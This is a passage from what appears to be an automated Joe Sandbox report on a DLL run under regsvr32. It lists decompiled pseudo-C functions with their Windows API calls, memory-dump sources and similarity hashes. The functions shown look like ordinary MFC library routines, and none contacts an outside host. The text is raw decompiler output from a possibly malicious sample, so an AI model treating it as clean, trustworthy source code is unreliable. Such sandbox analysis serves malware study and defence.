                                                                                                                • LockResource.KERNEL32(00000000), ref: 1003F179
                                                                                                                • FreeResource.KERNEL32(?), ref: 1003F203
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
                                                                                                                • Instruction ID: 7d04399fb8401ab0899cde0e742f6d9608f8fb1466ab0f43d1cb39ed68eb6d21
                                                                                                                • Opcode Fuzzy Hash: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
                                                                                                                • Instruction Fuzzy Hash: C821B07A500221EEEB15DBB1CC858BBB7A8EF45642B00842DF982DA291EA34ED40D760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10041D9B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t34;
                                                                                                                				intOrPtr* _t62;
                                                                                                                				void* _t63;
                                                                                                                				void* _t64;
                                                                                                                
                                                                                                                				_t64 = __eflags;
                                                                                                                				_push(0x24);
                                                                                                                				E1004764D(0x100916ef, __ebx, __edi, __esi);
                                                                                                                				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
                                                                                                                				E1001E397(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
                                                                                                                				 *(_t63 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
                                                                                                                					L8:
                                                                                                                					__eflags =  *(_t62 + 0x30);
                                                                                                                					if( *(_t62 + 0x30) == 0) {
                                                                                                                						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
                                                                                                                						__eflags = _t34;
                                                                                                                						if(_t34 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
                                                                                                                						}
                                                                                                                						L14:
                                                                                                                						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                                						if( *(_t63 - 0x10) != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t63 - 0x14)));
                                                                                                                							_push(0);
                                                                                                                							E1001D714();
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						return E10047725(1);
                                                                                                                					}
                                                                                                                					L9:
                                                                                                                					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t63 - 0x10);
                                                                                                                					if( *(_t63 - 0x10) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t63 - 0x14)));
                                                                                                                						_push(0);
                                                                                                                						E1001D714();
                                                                                                                					}
                                                                                                                					_push(2);
                                                                                                                					_pop(1);
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				if( *(_t62 + 0x30) != 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push(_t63 - 0x30);
                                                                                                                				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					 *(_t62 + 0x30) = 1;
                                                                                                                					do {
                                                                                                                					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
                                                                                                                					do {
                                                                                                                					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
                                                                                                                					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
                                                                                                                					 *(_t62 + 0x30) = 0;
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10041DA2
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 10041DFC
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 10041E13
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 10041E4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3998274959-0
                                                                                                                • Opcode ID: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
                                                                                                                • Instruction ID: ca689670030baaae4ba4fb0637ad45d80908a774964eb7643ea7462241452c8c
                                                                                                                • Opcode Fuzzy Hash: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
                                                                                                                • Instruction Fuzzy Hash: AD314B75A0074AEBDB20DFA5CD85E9EB7E8FF04344F610A29FA52E61C1D770AA40CB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003887F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t31;
                                                                                                                				intOrPtr _t36;
                                                                                                                				long _t42;
                                                                                                                				char* _t48;
                                                                                                                				intOrPtr _t54;
                                                                                                                				char* _t62;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr _t68;
                                                                                                                				char* _t70;
                                                                                                                				void* _t71;
                                                                                                                
                                                                                                                				_t65 = __edi;
                                                                                                                				_t64 = __edx;
                                                                                                                				_push(8);
                                                                                                                				E1004764D(0x10090d72, __ebx, __edi, __esi);
                                                                                                                				_t68 = __ecx;
                                                                                                                				_t31 =  *((intOrPtr*)(__ecx + 0x74));
                                                                                                                				 *(_t71 - 0x14) = 0;
                                                                                                                				if(( *(_t31 + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
                                                                                                                					_t54 =  *((intOrPtr*)(_t68 + 0x1c4));
                                                                                                                					__eflags = _t54;
                                                                                                                					if(_t54 == 0) {
                                                                                                                						__eflags =  *((intOrPtr*)(_t31 + 0x3a));
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L10;
                                                                                                                						} else {
                                                                                                                							_t68 = _t31;
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						__eflags =  *((intOrPtr*)(_t54 + 0x3a));
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t68 = _t54;
                                                                                                                							L14:
                                                                                                                							_t36 = ( *(_t68 + 0x3a) & 0x0000ffff) +  *((intOrPtr*)(_t68 + 0x1c));
                                                                                                                							__eflags = _t36;
                                                                                                                							_push(_t36);
                                                                                                                						} else {
                                                                                                                							L10:
                                                                                                                							_push(0x1009c448);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E1000B543(0,  *((intOrPtr*)(_t71 + 8)), _t65, _t68, __eflags);
                                                                                                                				} else {
                                                                                                                					L1000140B(_t71 - 0x10, E100184C0());
                                                                                                                					 *((intOrPtr*)(_t71 - 4)) = 0;
                                                                                                                					 *(_t71 - 0x14) = L100011F4(_t71 - 0x10, 0x104);
                                                                                                                					_t42 = SendMessageA( *(E10013FEA(0, _t71 - 0x10, _t71, GetParent( *(_t68 + 0x20))) + 0x20), 0x464, 0x104,  *(_t71 - 0x14));
                                                                                                                					E1000FED3(_t71 - 0x10, 0xffffffff);
                                                                                                                					if(_t42 < 0) {
                                                                                                                						L7:
                                                                                                                						L100011D1(_t71 - 0x10);
                                                                                                                						L100010F5( *((intOrPtr*)(_t71 + 8)), __eflags, _t71 - 0x10);
                                                                                                                						_t62 =  &(( *(_t71 - 0x10))[0xfffffffffffffff0]);
                                                                                                                					} else {
                                                                                                                						_t70 =  *(_t71 - 0x10);
                                                                                                                						_t48 = PathFindExtensionA(_t70);
                                                                                                                						if(_t48 == 0 ||  *_t48 != 0x2e) {
                                                                                                                							goto L7;
                                                                                                                						} else {
                                                                                                                							_push( &(_t48[1]));
                                                                                                                							E1000B543(0,  *((intOrPtr*)(_t71 + 8)), 0x104, _t70,  &(_t48[1]));
                                                                                                                							_t62 = _t70 - 0x10;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L100013E3(_t62, _t64);
                                                                                                                				}
                                                                                                                				return E10047725( *((intOrPtr*)(_t71 + 8)));
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10038886
                                                                                                                • GetParent.USER32(?), ref: 100388D0
                                                                                                                • SendMessageA.USER32 ref: 100388E8
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10038902
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$ExtensionFindMessageParentPathSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 650063787-0
                                                                                                                • Opcode ID: ea741d1dcc3730a79ec89614de4668360d4dc39996ad634e460e8d42867bf0fe
                                                                                                                • Instruction ID: 2f896eae525bb4071195c68d8a2def441425b7df24b3d35e3c6fbc5014a471a2
                                                                                                                • Opcode Fuzzy Hash: ea741d1dcc3730a79ec89614de4668360d4dc39996ad634e460e8d42867bf0fe
                                                                                                                • Instruction Fuzzy Hash: E821CC758006469FDF21DFA0CC80ABE77B0FF05345B050AAEF552AB191DB30AA40CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1001A795(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				void* _t48;
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr* _t71;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t75;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t76 = __eflags;
                                                                                                                				_push(0x60);
                                                                                                                				E10047680(0x1008ee52, __ebx, __edi, __esi);
                                                                                                                				_t71 =  *((intOrPtr*)(_t75 + 8));
                                                                                                                				_t73 =  *((intOrPtr*)(_t71 + 4));
                                                                                                                				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
                                                                                                                				E100128F2(_t75 - 0x68, _t76);
                                                                                                                				 *(_t75 - 4) = 0;
                                                                                                                				 *(_t75 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(E1001DD4F(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
                                                                                                                				_t36 = E1001E302(0, _t71, _t73, _t76);
                                                                                                                				_t9 = _t36 + 0x74; // 0x74
                                                                                                                				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
                                                                                                                				 *((intOrPtr*)(E1001988F(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
                                                                                                                				E1001A66C(_t73, _t76);
                                                                                                                				_t40 =  *((intOrPtr*)(E1001E302(0, _t71, _t73, _t76) + 4));
                                                                                                                				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
                                                                                                                					_t54 =  *((intOrPtr*)(_t40 + 0x20));
                                                                                                                					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
                                                                                                                						E1001402B(_t75 - 0x68, _t75,  *((intOrPtr*)(_t54 + 0x20)));
                                                                                                                						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t75 - 4) = 0;
                                                                                                                				_t59 =  *(_t71 + 0x14);
                                                                                                                				SetEvent( *(_t71 + 0x10));
                                                                                                                				WaitForSingleObject(_t59, 0xffffffff);
                                                                                                                				CloseHandle(_t59);
                                                                                                                				_t44 =  *((intOrPtr*)(_t73 + 0x38));
                                                                                                                				_t81 = _t44;
                                                                                                                				if(_t44 == 0) {
                                                                                                                					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
                                                                                                                					__eflags = _t46;
                                                                                                                					_t47 =  *_t73;
                                                                                                                					if(_t46 != 0) {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
                                                                                                                					} else {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
                                                                                                                				}
                                                                                                                				E10014064(_t59, _t75 - 0x68);
                                                                                                                				_push(1);
                                                                                                                				E1001A36D(_t75 - 0x68, _t81, _t48);
                                                                                                                				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                                                                                                                				E10014A18(_t59, _t75 - 0x68, _t71, _t48, _t81);
                                                                                                                				return E10047725(0);
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001A79C
                                                                                                                  • Part of subcall function 1001A66C: GetCurrentThreadId.KERNEL32 ref: 1001A67F
                                                                                                                  • Part of subcall function 1001A66C: SetWindowsHookExA.USER32(000000FF,V$>,00000000,00000000), ref: 1001A68F
                                                                                                                • SetEvent.KERNEL32(?,00000060), ref: 1001A849
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A852
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A859
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1532457625-0
                                                                                                                • Opcode ID: d45ea3b7feff309df0efdf8f229d8945ca831929a4a26ca04bef5c0179c09f7d
                                                                                                                • Instruction ID: 48ee8a3e715e40a45da55d585f65e9619b2ee3e199d2fb2f7ec349d750b1c6e6
                                                                                                                • Opcode Fuzzy Hash: d45ea3b7feff309df0efdf8f229d8945ca831929a4a26ca04bef5c0179c09f7d
                                                                                                                • Instruction Fuzzy Hash: 8F314C74900645DFCB14EFA0C68594DBBF1FF09300B524569E1569B2A2DF30EAC5CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1002AC09(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed char _v264;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t11;
                                                                                                                				signed int _t14;
                                                                                                                				void* _t16;
                                                                                                                				char _t19;
                                                                                                                				signed int _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				signed int* _t34;
                                                                                                                				CHAR* _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t26 = __ebx;
                                                                                                                				_t11 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t11 ^ _t37;
                                                                                                                				_t34 = _a8;
                                                                                                                				_push(0x100);
                                                                                                                				_t33 =  &_v264;
                                                                                                                				_push( &_v264);
                                                                                                                				_push(_a4);
                                                                                                                				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
                                                                                                                				if(_t14 != 0) {
                                                                                                                					_push(__ebx);
                                                                                                                					_push(__esi);
                                                                                                                					_t36 =  &_v264;
                                                                                                                					_t16 = E1004DD3B(_v264 & 0x000000ff);
                                                                                                                					while(_t16 != 0) {
                                                                                                                						_t36 = CharNextA(_t36);
                                                                                                                						_t16 = E1004DD3B( *_t36 & 0x000000ff);
                                                                                                                					}
                                                                                                                					_t19 =  *_t36;
                                                                                                                					if(_t19 == 0x2b || _t19 == 0x2d) {
                                                                                                                						_t36 = CharNextA(_t36);
                                                                                                                					}
                                                                                                                					_t22 = E1004DC6B( *_t36 & 0x000000ff);
                                                                                                                					_pop(_t35);
                                                                                                                					_pop(_t26);
                                                                                                                					if(_t34 != 0) {
                                                                                                                						 *_t34 = _t22;
                                                                                                                					}
                                                                                                                					if(_t22 == 0) {
                                                                                                                						L3:
                                                                                                                						_t23 = 0;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						_push(0xa);
                                                                                                                						_push(0);
                                                                                                                						_push( &_v264);
                                                                                                                						if(_a12 == 0) {
                                                                                                                							_t23 = E1004DB61();
                                                                                                                						} else {
                                                                                                                							_t23 = E1004DB1D();
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						return E1004763E(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t34 != 0) {
                                                                                                                					 *_t34 =  *_t34 & _t14;
                                                                                                                				}
                                                                                                                				goto L3;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • CharNextA.USER32(?), ref: 1002AC60
                                                                                                                  • Part of subcall function 1004DD3B: __ismbcspace_l.LIBCMT ref: 1004DD41
                                                                                                                • CharNextA.USER32(00000000), ref: 1002AC7D
                                                                                                                • _strtol.LIBCMT ref: 1002ACA8
                                                                                                                • _strtoul.LIBCMT ref: 1002ACAF
                                                                                                                  • Part of subcall function 1004DB61: strtoxl.LIBCMT ref: 1004DB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                • String ID:
                                                                                                                • API String ID: 4211061542-0
                                                                                                                • Opcode ID: 11e979e455144ecb99cc4bd97b1e4237e4f76c46ac494c7ec6bbabd890d30392
                                                                                                                • Instruction ID: a10ca92737466be798e339b43ed86d3508cd612b3bd6a436f2c12da44ef0d25b
                                                                                                                • Opcode Fuzzy Hash: 11e979e455144ecb99cc4bd97b1e4237e4f76c46ac494c7ec6bbabd890d30392
                                                                                                                • Instruction Fuzzy Hash: 482124729002559BCB10DB749C81BAA77E8EF0A380FB200A6F980D7140DF74ED818BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E100304E5(signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                				void* _t15;
                                                                                                                				signed int _t17;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                				signed int _t23;
                                                                                                                				signed int* _t31;
                                                                                                                
                                                                                                                				_t31 = _a8;
                                                                                                                				if(_t31 == 0) {
                                                                                                                					return _t15;
                                                                                                                				}
                                                                                                                				_t23 = _a4;
                                                                                                                				if((_t23 & 0x00002000) == 0) {
                                                                                                                					_t17 = (_t23 & 0x0000ffff) - 8;
                                                                                                                					if(_t17 == 0) {
                                                                                                                						__imp__#6( *_t31);
                                                                                                                						L16:
                                                                                                                						 *_t31 =  *_t31 & 0x00000000;
                                                                                                                						L17:
                                                                                                                						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                                                                							__imp__CoTaskMemFree(_t31[1]);
                                                                                                                						}
                                                                                                                						return _t17;
                                                                                                                					}
                                                                                                                					_t18 = _t17 - 1;
                                                                                                                					if(_t18 == 0) {
                                                                                                                						L13:
                                                                                                                						_t17 =  *_t31;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t17 = _t18 - 3;
                                                                                                                					if(_t17 == 0) {
                                                                                                                						__imp__#9(_t31);
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t19 = _t17 - 1;
                                                                                                                					if(_t19 == 0) {
                                                                                                                						goto L13;
                                                                                                                					} else {
                                                                                                                						_t17 = _t19 - 0x7b;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							E1003045C( &_a8, _a12);
                                                                                                                							_t17 = _a8;
                                                                                                                							if(_t17 != 0) {
                                                                                                                								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
                                                                                                                								_t17 = _a8;
                                                                                                                								if(_t17 != 0) {
                                                                                                                									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t17 =  *_t31;
                                                                                                                				if(_t17 == 0) {
                                                                                                                					goto L17;
                                                                                                                				} else {
                                                                                                                					__imp__#16(_t17);
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArrayDestroyFreeSafeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253174383-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100423B4(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				void* _t12;
                                                                                                                				void* _t20;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t39;
                                                                                                                				void* _t40;
                                                                                                                				void* _t43;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t36 = __edi;
                                                                                                                				_t27 = __ebx;
                                                                                                                				_t39 = _t30;
                                                                                                                				 *((intOrPtr*)(_t44 + 4)) = _t39;
                                                                                                                				_t12 = E10013F46(__ebx, _t30, __edi, __eflags);
                                                                                                                				if(_t12 != 0) {
                                                                                                                					if((E100177F8(_t39) & 0x00000100) != 0) {
                                                                                                                						_t32 = _t39;
                                                                                                                						_t43 = E10015912(__ebx, _t39, __edi);
                                                                                                                						_t48 = _t43;
                                                                                                                						if(_t43 == 0) {
                                                                                                                							E1000A069(__ebx, _t32, __edi, _t39, _t48);
                                                                                                                						}
                                                                                                                						_push(_t27);
                                                                                                                						_push(_t36);
                                                                                                                						_t40 = E10013FEA(_t27, _t32, _t43, GetForegroundWindow());
                                                                                                                						if(_t43 == _t40 || E10013FEA(0x36d, _t32, _t43, GetLastActivePopup( *(_t43 + 0x20))) == _t40 && SendMessageA( *(_t40 + 0x20), 0x36d, 0x40, 0) != 0) {
                                                                                                                							_t20 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                						} else {
                                                                                                                							_t20 = 0;
                                                                                                                						}
                                                                                                                						SendMessageA( *( *((intOrPtr*)(_t44 + 0x10)) + 0x20), 0x36d, 4 + (0 | _t20 == 0x00000000) * 4, 0);
                                                                                                                					}
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetForegroundWindow.USER32 ref: 100423EB
                                                                                                                • GetLastActivePopup.USER32(?), ref: 1004240B
                                                                                                                • SendMessageA.USER32 ref: 10042423
                                                                                                                • SendMessageA.USER32 ref: 10042449
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2019557511-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001BB0D(void* __ecx) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t28;
                                                                                                                				void* _t30;
                                                                                                                				struct HINSTANCE__* _t32;
                                                                                                                				signed int _t34;
                                                                                                                				signed short _t35;
                                                                                                                				void* _t37;
                                                                                                                				signed short* _t40;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t28);
                                                                                                                				_t37 = __ecx;
                                                                                                                				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                                				_t40 =  *(__ecx + 0x60);
                                                                                                                				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                                					_t32 =  *(E1001E302(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                                					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					_t40 = LockResource(_v8);
                                                                                                                				}
                                                                                                                				_t30 = 1;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t35 =  *_t40;
                                                                                                                					if(_t40[1] != 0xffff) {
                                                                                                                						_t23 = _t40[5] & 0x0000ffff;
                                                                                                                						_t34 = _t40[6] & 0x0000ffff;
                                                                                                                					} else {
                                                                                                                						_t35 = _t40[6];
                                                                                                                						_t23 = _t40[9] & 0x0000ffff;
                                                                                                                						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                                					}
                                                                                                                					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                                						_t30 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *(_t37 + 0x58) != 0) {
                                                                                                                					FreeResource(_v8);
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001BB33
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001BB3B
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001BB4D
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1001BB97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
                                                                                                                • Instruction ID: 0eb972119714696451402e669bdf57dc20bcf58fed3d00780577fdfd15a11bb1
                                                                                                                • Opcode Fuzzy Hash: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
